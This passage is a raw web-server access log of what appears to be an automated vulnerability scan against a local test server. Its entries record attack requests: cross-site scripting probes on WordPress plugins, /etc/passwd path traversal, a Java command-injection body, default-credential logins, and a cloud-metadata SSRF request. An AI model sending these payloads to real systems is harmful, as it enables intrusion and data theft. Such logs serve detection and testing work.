+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /labkey/__r1/login-login.view?returnUrl=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/46 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"{\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22id\x22: \x22nuclei\x22,\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22condition\x22: {\x0D\x0A \x22parameterValues\x22: {\x0D\x0A \x22nuclei\x22: \x22script::Runtime.getRuntime().exec('id')\x22\x0D\x0A },\x0D\x0A \x22type\x22: \x22profilePropertyCondition\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22sessionId\x22: \x22nuclei\x22\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /context.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /creaprezzi.php?prezzoperiodo4=%22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"_charset_=utf-8&j_username=grios&j_password=password&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29KBaJ6sraNg3nrTlKSyVdpcZ6M/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22fs\x22,\x0D\x0A \x22settings\x22: {\x0D\x0A \x22location\x22: \x22/usr/share/elasticsearch/repo/test\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_snapshot/test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configprops HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/47 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /homepage.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modifica_cliente.php?tipo_tabella=%22>&idclienti=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"_charset_=utf-8&j_username=replication-receiver&j_password=replication-receiver&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29KBaJ6sraNg3nrTlKSyVdpcZ6M/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"errorpage=/etc/passwd&obj-action=auth&:action=login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/webproc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22fs\x22,\x0D\x0A \x22settings\x22: {\x0D\x0A \x22location\x22: \x22/usr/share/elasticsearch/repo/test/snapshot-backdata\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_snapshot/test2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/configprops HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/48 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apiclient/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webEdition/showTempFile.php?file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A 00000001-00000001\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A <_this xsi:type=\x22ManagedObjectReference\x22 type=\x22ServiceInstance\x22>ServiceInstance\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sdk/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms5.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"system.listMethods","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dati/availability_tpl.php?num_app_tipo_richiesti1=%22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"_charset_=utf-8&j_username=vgnadmin&j_password=vgnadmin&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/computeMetadata/v1/project/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.105","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ansible.cfg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/49 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pki/images/keyManager_title.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xampp/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 